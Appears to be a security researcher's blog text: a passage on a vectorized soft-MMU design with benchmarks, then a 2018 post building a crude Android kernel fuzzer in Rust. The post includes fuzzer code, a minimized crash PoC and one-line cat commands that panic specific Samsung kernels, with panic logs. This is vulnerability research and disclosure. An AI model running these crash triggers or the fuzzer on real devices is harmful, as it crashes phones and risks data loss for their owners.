Memory accesses themselves are pretty fast in my vectorized model, however the translations are slow. To mitigate this I split up translations and read/write operations in my IL. Since page walks, dirty updates, and permission checks are done in my translate IL instruction, I’m able to reuse translations from previous locations in the IL graph which use the same IL expression as the address.

For example, a 4-byte translate for writing of rsp+0x50 occurs at the root block of a function. Now at future locations in the graph which read or write at the same location for 4-or-fewer bytes can reuse the translation. Since it’s an SSA the rsp+0x50 value is tied to a certain version of rsp, thus changes to rsp do not cause the wrong translation to be used. This effectively deletes the page walks for stack locals and other memory which is not dynamically indexed in the function. It’s kind of like having a TLB in the IL itself.

Since the initial translate was responsible for the permission checks and updates of things like the RaW bits and dirty bits, we never have to run these checks again in this case. This turns memory operations into simple loads and stores.

Since stores are supersets of loads and larger sizes are supersets of smaller sizes, I can use translations from slightly different sizes and accesses.

Since it’s possible a VM exit occurs and memory/permissions are changed, I must have invalidate these translations on VM exits. More specifically I can invalidate them only on VM entries where a page table modification was made since the last VM exit. This makes the invalidate case rare enough to not matter.

The performance numbers

These are the performance numbers (in cycles) for each type and size of operation. The translate times are the cost of walking the page tables and validating permissions, the access times are the cost of reading/writing to already translated memory. The benchmarks were done on a Xeon Phi 7210 on a single hardware thread. All times are in cycles for a translation and access times for all 8 lanes.

These are best-case translate/access times as it’s the same memory translated in a loop over and over causing the tables and memory in question to be present in L1 cache.

The divergent cases are ones where different addresses were supplied to each lane and force vectorized page walks.

Write: false | opsize: 1 | Diverge: false | Translate    37.8132 cycles | Access    10.5450 cycles
Write: false | opsize: 2 | Diverge: false | Translate    39.0831 cycles | Access    11.3500 cycles
Write: false | opsize: 4 | Diverge: false | Translate    39.7298 cycles | Access    10.6403 cycles
Write: false | opsize: 8 | Diverge: false | Translate    35.2704 cycles | Access     9.6881 cycles
Write: true  | opsize: 1 | Diverge: false | Translate    44.9504 cycles | Access    16.6908 cycles
Write: true  | opsize: 2 | Diverge: false | Translate    45.9377 cycles | Access    15.0110 cycles
Write: true  | opsize: 4 | Diverge: false | Translate    44.8083 cycles | Access    16.0191 cycles
Write: true  | opsize: 8 | Diverge: false | Translate    39.7565 cycles | Access     8.6500 cycles
Write: false | opsize: 1 | Diverge: true  | Translate   140.2084 cycles | Access    16.6964 cycles
Write: false | opsize: 2 | Diverge: true  | Translate   141.0708 cycles | Access    16.7114 cycles
Write: false | opsize: 4 | Diverge: true  | Translate   140.0859 cycles | Access    16.6728 cycles
Write: false | opsize: 8 | Diverge: true  | Translate   137.5321 cycles | Access    14.1959 cycles
Write: true  | opsize: 1 | Diverge: true  | Translate   158.5673 cycles | Access    22.9880 cycles
Write: true  | opsize: 2 | Diverge: true  | Translate   159.3837 cycles | Access    21.2704 cycles
Write: true  | opsize: 4 | Diverge: true  | Translate   156.8409 cycles | Access    22.9207 cycles
Write: true  | opsize: 8 | Diverge: true  | Translate   156.7783 cycles | Access    16.6400 cycles

Performance analysis

These numbers actually look really good. Just about 10 or so cycles for most accesses. The translations are much more expensive but with TLBs and caching the translations in the IL tree we should hopefully do these things rarely. The divergent translation times are about 3.5x more expensive than the scalar counterparts which is pretty impressive. 8 separate page walks at only 3.5x more cost than a single walk! That’s a big win for this new MMU!

TLBs (not implemented as of this writing)

Similar to the cached translations in the IL tree, I can have a TLB which caches a limited amount of arbitrary translations, just like an actual CPU or many other JITs. I currently plan on having TLB entries for each type of operation such that no permission checks are needed on read/write routines. However I could use a more typical TLB model where translations are cached (rather than permission checks and RaW updates), and then I would have to perform permission checks and RaW updates on all memory accesses (but not the translation phase).

I plan to just implement both models and benchmark them. The complexity of theorizing this performance difference is higher than just doing it and getting real measurements…

Fast injection/permission modifications

To support fast fuzz case injection and permission changes I have a few handwritten AVX-512 routines which are optimized for speed. These can then be tested against the naive reference implementation for correctness as there’s a much higher chance for mistakes.

I expose 3 different routines for this. A vectorized broadcast (writing the same memory to multiple VMs), a vectorized memset (applying the same byte to either memory contents or permissions), and a vectorized write-multiple.

Vectorized broadcast

This one is pretty simple. You supply an address in the VM, a payload, and a mask (deciding which VMs to actually write to). This will then write the same payload to all VMs which are enabled by the mask. This surprisingly doesn’t have a huge use case that I can think of yet.

Vectorized memset

Since permissions and memory are stored right next to each other this memset is written in a way that it can be used to update either permissions or contents. This takes in an address, a byte to broadcast, a bool indicating if it should write to permissions or contents, and a mask of VMs to broadcast to.

This routine is how permissions are updated in bulk. I can quickly update permissions on arbitrary sets of VMs in a vectorized manner. Further it can be used on contents to do things like handle zeroing of memory on a hooked call like malloc().

Vectorized write-multiple

This is how we get fuzz cases in. I take one address, a VM mask, and multiple inputs. I then inject those inputs to their corresponding VMs all at the same address. This allows me to write all my differing fuzz cases to the same location in memory very quickly. Since most fuzzing is writing an input to all VMs at the same location this should suffice for most cases. If I find I’m frequently writing multiple inputs to multiple different locations I’ll probably make another specialized routine.

Due to the complexities of handling partial reads from the input buffers in a vectorized way, this routine is restricted to writing 8-byte size aligned payloads to 8-byte aligned addresses. To get around this I just pad out my fuzz inputs to 8-byte boundaries.

Are these fast routines really needed?

For example the benchmarks for the Rust implementation for a page table of shape: [16, 16, 16, 13, 3]

Note that the benchmarks are a single hardware thread running on a Xeon Phi 7210

Empty SoftMMU created in                            0.0000 seconds
1 MiB of deduped memory added in                    0.1873 seconds
1024 byte chunks read per second                30115.5741
1024 byte chunks written per second             29243.0394
1024 byte chunks memset per second              29340.3969
1024 byte chunks permed per second              34971.7952
1024 byte chunks write multiple per second       6864.1243

And the AVX-512 handwritten implementation on the same machine and same shape:

Empty SoftMMU created in                            0.0000 seconds
1 MiB of deduped memory added in                    0.1878 seconds
1024 byte chunks read per second                30073.5090
1024 byte chunks written per second            770678.8377
1024 byte chunks memset per second             777488.8143
1024 byte chunks permed per second             780162.1310
1024 byte chunks write multiple per second     751352.4038

Effectively a 25x speedup for the same result!

With a larger page size ([16, 16, 16, 6, 10]) this number goes down as I can use the old translation longer and I spend less time translating pages:

Rust implementations:

Empty SoftMMU created in                            0.0001 seconds
1 MiB of deduped memory added in                    0.0829 seconds
1024 byte chunks read per second                30201.6634
1024 byte chunks written per second             31850.8188
1024 byte chunks memset per second              31818.1619
1024 byte chunks permed per second              34690.8332
1024 byte chunks write multiple per second       7345.5057

Hand-optimized implementations:

Empty SoftMMU created in                            0.0001 seconds
1 MiB of deduped memory added in                    0.0826 seconds
1024 byte chunks read per second                30168.3047
1024 byte chunks written per second          32993840.4624
1024 byte chunks memset per second           33131493.5139
1024 byte chunks permed per second           36606185.6217
1024 byte chunks write multiple per second   10775641.4470

In this case it’s over 1000x faster for some of the implementations! At this rate we can trivially get inputs in much faster than the underlying code possibly could run!


Future improvements/ideas

Currently a full 64-bit address space is emulated. Since nothing we emulate uses a full 64-bit address space this is overkill and increases the page table memory size and page table walk costs. In the future I plan to add support for partial address space support. For example if you only define the page table to handle 16-bit addresses, it will, optionally based on another constant, make sure addresses are sign-extended or zero-extended from these 16-bit addresses. By supporting both sign-extended and zero-extended addresses we should be able to model all architecture’s specific behaviors. This means if running a 32-bit application in our 64-bit JIT we could use a 32-bit address space and decrease the cost of the MMU.

I could add more fast-injection routines as needed.

I may move permission checks to loads/stores rather than translation IL operations, to allow reuse of TLB entries for the same page but differing offsets/operations.

Writing the worlds worst Android fuzzer, and then improving it

18 October 2018 at 09:57

So slimy it belongs in the slime tree

Why

Changelog

Date Info
2018-10-18 Initial

Tweeter

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up, or I think you can use RSS or something if you’re still one of those people.

Disclaimer

I recognize the bugs discussed here are not widespread Android bugs individually. None of these are terribly critical and typically only affect one specific device. This blog is meant to be fun and silly and not meant to be a serious review of Android’s security.

Give me the code

Slime Tree Repo

Intro

Today we’re going to write arguably one of the worst Android fuzzers possible. Experience unexpected success, and then make improvements to make it probably the second worst Android fuzzer.

When doing Android device fuzzing the first thing we need to do is get a list of devices on the phone and figure out which ones we can access. This is simple right? All we have to do is go into /dev and run ls -l, and anything with read or write permissions for all users we might have a whack at. Well… with selinux this is just not the case. There might be one person in the world who understands selinux but I’m pretty sure you need a Bombe to decode the selinux policies.

To solve this problem let’s do it the easy way and write a program that just runs in the context we want bugs from. This program will simply recursively list all files on the phone and actually attempt to open them for reading and writing. This will give us the true list of files/devices on the phone we are able to open. In this blog’s case we’re just going to use adb shell and thus we’re running as u:r:shell:s0.

Recursive listdiring

Alright so I want a quick list of all files on the phone and whether I can read or write to them. This is pretty easy, let’s do it in Rust.

/// Recursively list all files starting at the path specified by `dir`, saving
/// all files to `output_list`
fn listdirs(dir: &Path, output_list: &mut Vec<(PathBuf, bool, bool)>) {
    // List the directory
    let list = std::fs::read_dir(dir);

    if let Ok(list) = list {
        // Go through each entry in the directory, if we were able to list the
        // directory safely
        for entry in list {
            if let Ok(entry) = entry {
                // Get the path representing the directory entry
                let path = entry.path();

                // Get the metadata and discard errors
                if let Ok(metadata) = path.symlink_metadata() {
                    // Skip this file if it's a symlink
                    if metadata.file_type().is_symlink() {
                        continue;
                    }

                    // Recurse if this is a directory
                    if metadata.file_type().is_dir() {
                        listdirs(&path, output_list);
                    }

                    // Add this to the directory listing if it's a file
                    if metadata.file_type().is_file() {
                        let can_read =
                            OpenOptions::new().read(true).open(&path).is_ok();
                        
                        let can_write =
                            OpenOptions::new().write(true).open(&path).is_ok();

                        output_list.push((path, can_read, can_write));
                    }
                }
            }
        }
    }
}

Woo, that was pretty simple, to get a full directory listing of the whole phone we can just:

// List all files on the system
let mut dirlisting = Vec::new();
listdirs(Path::new("/"), &mut dirlisting);

Fuzzing

So now we have a list of all files. We now can use this for manual analysis and look through the listing and start doing source auditing of the phone. This is pretty much the correct way to find any good bugs, but maybe we can automate this process?

What if we just randomly try to read and write to the files. We don’t really have any idea what they expect, so let’s just write random garbage to them of reasonable sizes.

// List all files on the system
let mut listing = Vec::new();
listdirs(Path::new("/"), &mut listing);

// Fuzz buffer
let mut buf = [0x41u8; 8192];

// Fuzz forever
loop {
    // Pick a random file
    let rand_file = rand::random::<usize>() % listing.len();
    let (path, can_read, can_write) = &listing[rand_file];

    print!("{:?}\n", path);

    if *can_read {
        // Fuzz by reading
        let fd = OpenOptions::new().read(true).open(path);

        if let Ok(mut fd) = fd {
            let fuzz_size = rand::random::<usize>() % buf.len();
            let _ = fd.read(&mut buf[..fuzz_size]);
        }
    }

    if *can_write {
        // Fuzz by writing
        let fd = OpenOptions::new().write(true).open(path);
        if let Ok(mut fd) = fd {
            let fuzz_size = rand::random::<usize>() % buf.len();
            let _ = fd.write(&buf[..fuzz_size]);
        }
    }
}

When running this it pretty much stops right away, getting hung on things like /sys/kernel/debug/tracing/per_cpu/cpu1/trace_pipe. There are typically many sysfs and procfs files on the phone that will hang forever when trying to read from them. Since this prevents our “fuzzer” from running any longer we need to somehow get around blocking reads.

How about we just make lets say… 128 threads and just be okay with threads hanging? At least some of the others will keep going for at least a while? Here’s the complete program:

extern crate rand;

use std::sync::Arc;
use std::fs::OpenOptions;
use std::io::{Read, Write};
use std::path::{Path, PathBuf};

/// Maximum number of threads to fuzz with
const MAX_THREADS: u32 = 128;

/// Recursively list all files starting at the path specified by `dir`, saving
/// all files to `output_list`
fn listdirs(dir: &Path, output_list: &mut Vec<(PathBuf, bool, bool)>) {
    // List the directory
    let list = std::fs::read_dir(dir);

    if let Ok(list) = list {
        // Go through each entry in the directory, if we were able to list the
        // directory safely
        for entry in list {
            if let Ok(entry) = entry {
                // Get the path representing the directory entry
                let path = entry.path();

                // Get the metadata and discard errors
                if let Ok(metadata) = path.symlink_metadata() {
                    // Skip this file if it's a symlink
                    if metadata.file_type().is_symlink() {
                        continue;
                    }

                    // Recurse if this is a directory
                    if metadata.file_type().is_dir() {
                        listdirs(&path, output_list);
                    }

                    // Add this to the directory listing if it's a file
                    if metadata.file_type().is_file() {
                        let can_read =
                            OpenOptions::new().read(true).open(&path).is_ok();
                        
                        let can_write =
                            OpenOptions::new().write(true).open(&path).is_ok();

                        output_list.push((path, can_read, can_write));
                    }
                }
            }
        }
    }
}

/// Fuzz thread worker
fn worker(listing: Arc<Vec<(PathBuf, bool, bool)>>) {
    // Fuzz buffer
    let mut buf = [0x41u8; 8192];

    // Fuzz forever
    loop {
        let rand_file = rand::random::<usize>() % listing.len();
        let (path, can_read, can_write) = &listing[rand_file];

        //print!("{:?}\n", path);

        if *can_read {
            // Fuzz by reading
            let fd = OpenOptions::new().read(true).open(path);

            if let Ok(mut fd) = fd {
                let fuzz_size = rand::random::<usize>() % buf.len();
                let _ = fd.read(&mut buf[..fuzz_size]);
            }
        }

        if *can_write {
            // Fuzz by writing
            let fd = OpenOptions::new().write(true).open(path);
            if let Ok(mut fd) = fd {
                let fuzz_size = rand::random::<usize>() % buf.len();
                let _ = fd.write(&buf[..fuzz_size]);
            }
        }
    }
}

fn main() {
    // Optionally daemonize so we can swap from an ADB USB cable to a UART
    // cable and let this continue to run
    //daemonize();

    // List all files on the system
    let mut dirlisting = Vec::new();
    listdirs(Path::new("/"), &mut dirlisting);

    print!("Created listing of {} files\n", dirlisting.len());

    // We wouldn't do anything without any files
    assert!(dirlisting.len() > 0, "Directory listing was empty");

    // Wrap it in an `Arc`
    let dirlisting = Arc::new(dirlisting);

    // Spawn fuzz threads
    let mut threads = Vec::new();
    for _ in 0..MAX_THREADS {
        // Create a unique arc reference for this thread and spawn the thread
        let dirlisting = dirlisting.clone();
        threads.push(std::thread::spawn(move || worker(dirlisting)));
    }

    // Wait for all threads to complete
    for thread in threads {
        let _ = thread.join();
    }
}

extern {
    fn daemon(nochdir: i32, noclose: i32) -> i32;
}

pub fn daemonize() {
    print!("Daemonizing\n");

    unsafe {
        daemon(0, 0);
    }

    // Sleep to allow a physical cable swap
    std::thread::sleep(std::time::Duration::from_secs(10));
}

Pretty simple, nothing crazy here. We get a full phone directory listing, spin up MAX_THREADS threads, and those threads loop forever picking random files to read and write to.

Let me just give this a little push to the phone annnnnnnnnnnnnnd… and the phone panicked. In fact almost all the phones I have at my desk panicked!

There we go. We have created a world class Android kernel fuzzer, printing out new 0-day!

In this case we ran this on a Samsung Galaxy S8 (G950FXXU4CRI5), let’s check out how we crashed by reading /proc/last_kmsg from the phone:

Unable to handle kernel paging request at virtual address 00662625
sec_debug_set_extra_info_fault = KERN / 0x662625
pgd = ffffffc0305b1000
[00662625] *pgd=00000000b05b7003, *pud=00000000b05b7003, *pmd=0000000000000000
Internal error: Oops: 96000006 [#1] PREEMPT SMP
exynos-snapshot: exynos_ss_get_reason 0x0 (CPU:1)
exynos-snapshot: core register saved(CPU:1)
CPUMERRSR: 0000000002180488, L2MERRSR: 0000000012240160
exynos-snapshot: context saved(CPU:1)
exynos-snapshot: item - log_kevents is disabled
TIF_FOREIGN_FPSTATE: 0, FP/SIMD depth 0, cpu: 0
CPU: 1 MPIDR: 80000101 PID: 3944 Comm: Binder:3781_3 Tainted: G        W       4.4.111-14315050-QB19732135 #1
Hardware name: Samsung DREAMLTE EUR rev06 board based on EXYNOS8895 (DT)
task: ffffffc863c00000 task.stack: ffffffc863938000
PC is at kmem_cache_alloc_trace+0xac/0x210
LR is at binder_alloc_new_buf_locked+0x30c/0x4a0
pc : [<ffffff800826f254>] lr : [<ffffff80089e2e50>] pstate: 60000145
sp : ffffffc86393b960
[<ffffff800826f254>] kmem_cache_alloc_trace+0xac/0x210
[<ffffff80089e2e50>] binder_alloc_new_buf_locked+0x30c/0x4a0
[<ffffff80089e3020>] binder_alloc_new_buf+0x3c/0x5c
[<ffffff80089deb18>] binder_transaction+0x7f8/0x1d30
[<ffffff80089e0938>] binder_thread_write+0x8e8/0x10d4
[<ffffff80089e11e0>] binder_ioctl_write_read+0xbc/0x2ec
[<ffffff80089e15dc>] binder_ioctl+0x1cc/0x618
[<ffffff800828b844>] do_vfs_ioctl+0x58c/0x668
[<ffffff800828b980>] SyS_ioctl+0x60/0x8c
[<ffffff800815108c>] __sys_trace_return+0x0/0x4

Ah cool, derefing 00662625, my favorite kernel address! Looks like it’s some form of heap corruption. We probably could exploit this especially as if we mapped in 0x00662625 we would get to control a kernel land object from userland. It would require the right groom. This specific bug has been minimized and you can find a targeted PoC in the Wall of Shame section

Using the “fuzzer”

You’d think this fuzzer is pretty trivial to run, but there are some things that can really help it along. Especially on phones which seem to fight back a bit.

Protips:

  • Restart fuzzer regularly, it gets stuck a lot
  • Do random things on the phone like browsing or using the camera to generate kernel activity
  • Kill the app and unplug the ADB USB cable frequently, this can cause some of the bugs to trigger when the application suddenly dies
  • Tweak the MAX_THREADS value from low values to high values
  • Create blacklists for files which are known to block forever on reads

Using the above protips I’ve been able to get this fuzzer to work on almost every phone I have encountered in the past 4 years, with dwindling success as selinux policies get stricter.

Next device

Okay so we’ve looked at the latest Galaxy S8, let’s try to look at an older Galaxy S5 (G900FXXU1CRH1). Whelp, that one crashed even faster. However if we try to get /proc/last_kmsg we will discover that this file does not exist. We can also try using a fancy UART cable over USB with the magic 619k resistor and daemonize() the application so we can observe the crash over that. However that didn’t work in this case either (honestly not sure why, I get dmesg output but no panic log).

So now we have this problem. How do we root cause this bug? Well, we can do a binary search of the filesystem and blacklist files in certain folders and try to whittle it down. Lets give that a shot!

First let’s only allow use of /sys/* and beyond, all other files will be disallowed, typically these bugs from the fuzzer come from sysfs and procfs. We’ll do this by changing the directory listing call to listdirs(Path::new("/sys"), &mut dirlisting);

Woo, it worked! Crashed faster, and this time we limited to /sys. So we know the bug exists somewhere in /sys.

Now we’ll go deeper in /sys, maybe we try /sys/devices… oops, no luck. We’ll have to try another. Maybe /sys/kernel?… WINNER WINNER!

So we’ve whittled it down further to /sys/kernel/debug but now there are 85 folders in this directory. I really don’t want to manually try all of them. Maybe we can improve our fuzzer?

Improving the fuzzer

So currently we have no idea which files were touched to cause the crash. We can print them and then view them over ADB, however this doesn’t sync when the phone panics… we need even better.

Perhaps we should just send the filenames we’re fuzzing over the network and then have a service that acks the filenames, such that the files are not touched unless they have been confirmed to be reported over the wire. Maybe this would be too slow? Hard to say. Let’s give it a go!

We’ll make a quick server in Rust to run on our host, and then let the phone connect to this server over ADB USB via adb reverse tcp:13370 tcp:13370, which will forward connections to 127.0.0.1:13370 on the phone to our host where our program is running and will log filenames.

Designing a terrible protocol

We need a quick protocol that works over TCP to send filenames. I’m thinking something super easy. Send the filename, and then the server responds with “ACK”. We’ll just ignore threading issues and the fact that heap corruption bugs will usually show up after the file was accessed. We don’t want to get too carried away and make a reasonable fuzzer, eh?

use std::net::TcpListener;
use std::io::{Read, Write};

fn main() -> std::io::Result<()> {
    let listener = TcpListener::bind("0.0.0.0:13370")?;

    let mut buffer = vec![0u8; 64 * 1024];

    for stream in listener.incoming() {
        print!("Got new connection\n");

        let mut stream = stream?;

        loop {
            if let Ok(bread) = stream.read(&mut buffer) {
                // Connection closed, break out
                if bread == 0 {
                    break;
                }

                // Send acknowledge
                stream.write(b"ACK").expect("Failed to send ack");
                stream.flush().expect("Failed to flush");

                let string = std::str::from_utf8(&buffer[..bread])
                    .expect("Invalid UTF-8 character in string");
                print!("Fuzzing: {}\n", string);
            } else {
                // Failed to read, break out
                break;
            }
        }
    }

    Ok(())
}

This server is pretty trash, but it’ll do. It’s a fuzzer anyways, can’t find bugs without buggy code.

Client side

From the phone we just implement a simple function:

// Connect to the server we report to and pass this along to functions
// threads that need socket access
let stream = Arc::new(Mutex::new(TcpStream::connect("127.0.0.1:13370")
    .expect("Failed to open TCP connection")));

fn inform_filename(handle: &Mutex<TcpStream>, filename: &str) {
    // Report the filename
    let mut socket = handle.lock().expect("Failed to lock mutex");
    socket.write_all(filename.as_bytes()).expect("Failed to write");
    socket.flush().expect("Failed to flush");

    // Wait for an ACK
    let mut ack = [0u8; 3];
    socket.read_exact(&mut ack).expect("Failed to read ack");
    assert!(&ack == b"ACK", "Did not get ACK as expected");
}

Developing blacklist

Okay so now we have a log of all files we’re fuzzing, and they’re confirmed by the server so we don’t lose anything. Lets set it into single threaded mode so we don’t have to worry about race conditions for now.

We’ll see it frequently gets hung up on files. We’ll make note of the files it gets hung up on and start developing a blacklist. This takes some manual labor, and usually there are a handful (5-10) files we need to put in this list. I typically make my blacklist based on the start of a filename, thus I can blacklist entire directories based on starts_with matching.

Back to fuzzing

So when fuzzing the last file we saw touched was /sys/kernel/debug/smp2p_test/ut_remote_gpio_inout before a crash.

Let’s hammer this in a loop… and it worked! So now we can develop a fully self contained PoC:

use std::fs::File;
use std::io::Read;

fn thrasher() {
    // Buffer to read into
    let mut buf = [0x41u8; 8192];

    let fn = "/sys/kernel/debug/smp2p_test/ut_remote_gpio_inout";

    loop {
        if let Ok(mut fd) = File::open(fn) {
            let _ = fd.read(&mut buf);
        }
    }
}

fn main() {
    // Make fuzzing threads
    let mut threads = Vec::new();
    for _ in 0..4 {
        threads.push(std::thread::spawn(move || thrasher()));
    }

    // Wait for all threads to exit
    for thr in threads {
        let _ = thr.join();
    }
}

What a top tier PoC!

Next bug?

So now that we have root caused the bug, we should blacklist the specific file we know caused the bug and try again. Potentially this bug was hiding another.

Nope, nothing else, the S5 is officially secure and fixed of all bugs.

The end of an era

Sadly this fuzzer is on the way out. It used to work almost universally on every phone, and still does if selinux is set to permissive. But sadly as time has gone on these bugs have become hidden behind selinux policies that prevent them from being reached. It now only works on a few phones that I have rather than all of them, but the fact that it ever worked is probably the best part of it all.

There is a lot to improve this fuzzer, but the goal of this article was to make a terrible fuzzer, not a reasonable one. The big things to add to make this better

  • Make it perform random ioctl() calls
  • Make it attempt to mmap() and use the mappings for these devices
  • Actually understand what the file expects
  • Use multiple processes or something to let the fuzzer continue to run when it gets stuck
  • Run it for more than 1 minute before giving up on a phone
  • Make better blacklists/whitelists

In the future maybe I’ll exploit one of these bugs in another blog, or root cause them in source.

Wall of Shame

Try it out on your own test phones (not on your actual phone, that’d probably be a bad idea). Let me know if you have any silly bugs found by this to add to the wall of shame.

G900F (Exynos Galaxy S5) [G900FXXU1CRH1] (August 1, 2017)

PoC

use std::fs::File;
use std::io::Read;

fn thrasher() {
    // Buffer to read into
    let mut buf = [0x41u8; 8192];

    let fn = "/sys/kernel/debug/smp2p_test/ut_remote_gpio_inout";

    loop {
        if let Ok(mut fd) = File::open(fn) {
            let _ = fd.read(&mut buf);
        }
    }
}

fn main() {
    // Make fuzzing threads
    let mut threads = Vec::new();
    for _ in 0..4 {
        threads.push(std::thread::spawn(move || thrasher()));
    }

    // Wait for all threads to exit
    for thr in threads {
        let _ = thr.join();
    }
}

J200H (Galaxy J2) [J200HXXU0AQK2] (August 1, 2017)

not root caused, just run the fuzzer

[c0] Unable to handle kernel paging request at virtual address 62655726
[c0] pgd = c0004000
[c0] [62: ee456000
[c0] PC is at devres_for_each_res+0x68/0xdc
[c0] LR is at 0x62655722
[c0] pc : [<c0302848>]    lr : [<62655722>]    psr: 000d0093
sp : ee457d20  ip : 00000000  fp : ee457d54
[c0] r10: ed859210  r9 : c0c833e4  r8 : ed859338
[c0] r7 : ee456000
[c0] PC is at devres_for_each_res+0x68/0xdc
[c0] LR is at 0x62655722
[c0] pc : [<c0302848>]    lr : [<62655722>]    psr: 000d0093
[c0] [<c0302848>] (devres_for_each_res+0x68/0xdc) from [<c030d5f0>] (dev_cache_fw_image+0x4c/0x118)
[c0] [<c030d5f0>] (dev_cache_fw_image+0x4c/0x118) from [<c0306050>] (dpm_for_each_dev+0x4c/0x6c)
[c0] [<c0306050>] (dpm_for_each_dev+0x4c/0x6c) from [<c030d824>] (fw_pm_notify+0xe4/0x100)
[c0] [<c030d0013 00000000 ffffffff ffffffff
[c0] [<c0302848>] (devres_for_each_res+0x68/0xdc) from [<c030d5f0>] (dev_cache_fw_image+0x4c/0x118)
[c0] [<c030d5f0>] (dev_cache_fw_image+0x4c/0x118) from [<c0306050>] (dpm_for_each_dev+0x4c/0x6c)
[c0] [<c0306050>] (dpm_for_each_dev+0x4c/0x6c) from [<c030d824>] (fw_pm_notify+0xe4/0x100)
[c0] [<c030d[<c0063824>] (pm_notifier_call_chain+0x28/0x3c)
[c0] [<c0063824>] (pm_notifier_call_chain+0x28/0x3c) from [<c00644a0>] (pm_suspend+0x154/0x238)
[c0] [<c00644a0>] (pm_suspend+0x154/0x238) from [<c00657bc>] (suspend+0x78/0x1b8)
[c0] [<c00657bc>] (suspend+0x78/0x1b8) from [<c003d6bc>] (process_one_work+0x160/0x4b8)
[c0] [<c003d6bc>] [<c0063824>] (pm_notifier_call_chain+0x28/0x3c)
[c0] [<c0063824>] (pm_notifier_call_chain+0x28/0x3c) from [<c00644a0>] (pm_suspend+0x154/0x238)
[c0] [<c00644a0>] (pm_suspend+0x154/0x238) from [<c00657bc>] (suspend+0x78/0x1b8)
[c0] [<c00657bc>] (suspend+0x78/0x1b8) from [<c003d6bc>] (process_one_work+0x160/0x4b8)

J500H (Galaxy J5) [J500HXXU2BQI1] (August 1, 2017)

cat /sys/kernel/debug/usb_serial0/readstatus

or

cat /sys/kernel/debug/usb_serial1/readstatus

or

cat /sys/kernel/debug/usb_serial2/readstatus

or

cat /sys/kernel/debug/usb_serial3/readstatus

J500H (Galaxy J5) [J500HXXU2BQI1] (August 1, 2017)

cat /sys/kernel/debug/mdp/xlog/dump

J500H (Galaxy J5) [J500HXXU2BQI1] (August 1, 2017)

cat /sys/kernel/debug/rpm_master_stats

J700H (Galaxy J7) [J700HXXU3BRC2] (August 1, 2017)

not root caused, just run the fuzzer

Unable to handle kernel paging request at virtual address ff00000107
pgd = ffffffc03409d000
[ff00000107] *pgd=0000000000000000
mms_ts 9-0048: mms_sys_fw_update [START]
mms_ts 9-0048: mms_fw_update_from_storage [START]
mms_ts 9-0048: mms_fw_update_from_storage [ERROR] file_open - path[/sdcard/melfas.mfsb]
mms_ts 9-0048: mms_fw_update_from_storage [ERROR] -3
mms_ts 9-0048: mms_sys_fw_update [DONE]
muic-universal:muic_show_uart_sel AP
usb: enable_show dev->enabled=1
sm5703-fuelga0000000000000000
Kernel BUG at ffffffc00034e124 [verbose debug info unavailable]
Internal error: Oops - BUG: 96000004 [#1] PREEMPT SMP
exynos-snapshot: item - log_kevents is disabled
CPU: 4 PID: 9022 Comm: lulandroid Tainted: G        W    3.10.61-8299335 #1
task: ffffffc01049cc00 ti: ffffffc002824000 task.ti: ffffffc002824000
PC is at sysfs_open_file+0x4c/0x208
LR is at sysfs_open_file+0x40/0x208
pc : [<ffffffc00034e124>] lr : [<ffffffc00034e118>] pstate: 60000045
sp : ffffffc002827b70

G920F (Exynos Galaxy S6) [G920FXXU5DQBC] (Febuary 1, 2017) Now gated by selinux :(

sec_debug_store_fault_addr 0xffffff80000fe008
Unhandled fault: synchronous external abort (0x96000010) at 0xffffff80000fe008
------------[ cut here ]------------
Kernel BUG at ffffffc0003b6558 [verbose debug info unavailable]
Internal error: Oops - BUG: 96000010 [#1] PREEMPT SMP
exynos-snapshot: core register saved(CPU:0)
CPUMERRSR: 0000000012100088, L2MERRSR: 00000000111f41b8
exynos-snapshot: context saved(CPU:0)
exynos-snapshot: item - log_kevents is disabled
CPU: 0 PID: 5241 Comm: hookah Tainted: G        W      3.18.14-9519568 #1
Hardware name: Samsung UNIVERSAL8890 board based on EXYNOS8890 (DT)
task: ffffffc830513000 ti: ffffffc822378000 task.ti: ffffffc822378000
PC is at samsung_pin_dbg_show_by_type.isra.8+0x28/0x68
LR is at samsung_pinconf_dbg_show+0x88/0xb0
Call trace:
[<ffffffc0003b6558>] samsung_pin_dbg_show_by_type.isra.8+0x28/0x68
[<ffffffc0003b661c>] samsung_pinconf_dbg_show+0x84/0xb0
[<ffffffc0003b66d8>] samsung_pinconf_group_dbg_show+0x90/0xb0
[<ffffffc0003b4c84>] pinconf_groups_show+0xb8/0xec
[<ffffffc0002118e8>] seq_read+0x180/0x3ac
[<ffffffc0001f29b8>] vfs_read+0x90/0x148
[<ffffffc0001f2e7c>] SyS_read+0x44/0x84

G950F (Exynos Galaxy S8) [G950FXXU4CRI5] (September 1, 2018)

Can crash by getting PC in the kernel. Probably a race condition heap corruption. Needs a groom.

(This PC crash is old, since it’s corruption this is some old repro from an unknown version, probably April 2018 or so)

task: ffffffc85f672880 ti: ffffffc8521e4000 task.ti: ffffffc8521e4000
PC is at jopp_springboard_blr_x2+0x14/0x20
LR is at seq_read+0x15c/0x3b0
pc : [<ffffffc000c202b0>] lr : [<ffffffc00024a074>] pstate: a0000145
sp : ffffffc8521e7d20
x29: ffffffc8521e7d30 x28: ffffffc8521e7d90
x27: ffffffc029a9e640 x26: ffffffc84f10a000
x25: ffffffc8521e7ec8 x24: 00000072755fa348
x23: 0000000080000000 x22: 0000007282b8c3bc
x21: 0000000000000e71 x20: 0000000000000000
x19: ffffffc029a9e600 x18: 00000000000000a0
x17: 0000007282b8c3b4 x16: 00000000ff419000
x15: 000000727dc01b50 x14: 0000000000000000
x13: 000000000000001f x12: 00000072755fa1a8
x11: 00000072755fa1fc x10: 0000000000000001
x9 : ffffffc858cc5364 x8 : 0000000000000000
x7 : 0000000000000001 x6 : 0000000000000001
x5 : ffffffc000249f18 x4 : ffffffc000fcace8
x3 : 0000000000000000 x2 : ffffffc84f10a000
x1 : ffffffc8521e7d90 x0 : ffffffc029a9e600

PC: 0xffffffc000c20230:
0230  128001a1 17fec15d 128001a0 d2800015 17fec46e 128001b4 17fec62b 00000000
0250  01bc8a68 ffffffc0 d503201f a9bf4bf0 b85fc010 716f9e10 712eb61f 54000040
0270  deadc0de a8c14bf0 d61f0000 a9bf4bf0 b85fc030 716f9e10 712eb61f 54000040
0290  deadc0de a8c14bf0 d61f0020 a9bf4bf0 b85fc050 716f9e10 712eb61f 54000040
02b0  deadc0de a8c14bf0 d61f0040 a9bf4bf0 b85fc070 716f9e10 712eb61f 54000040
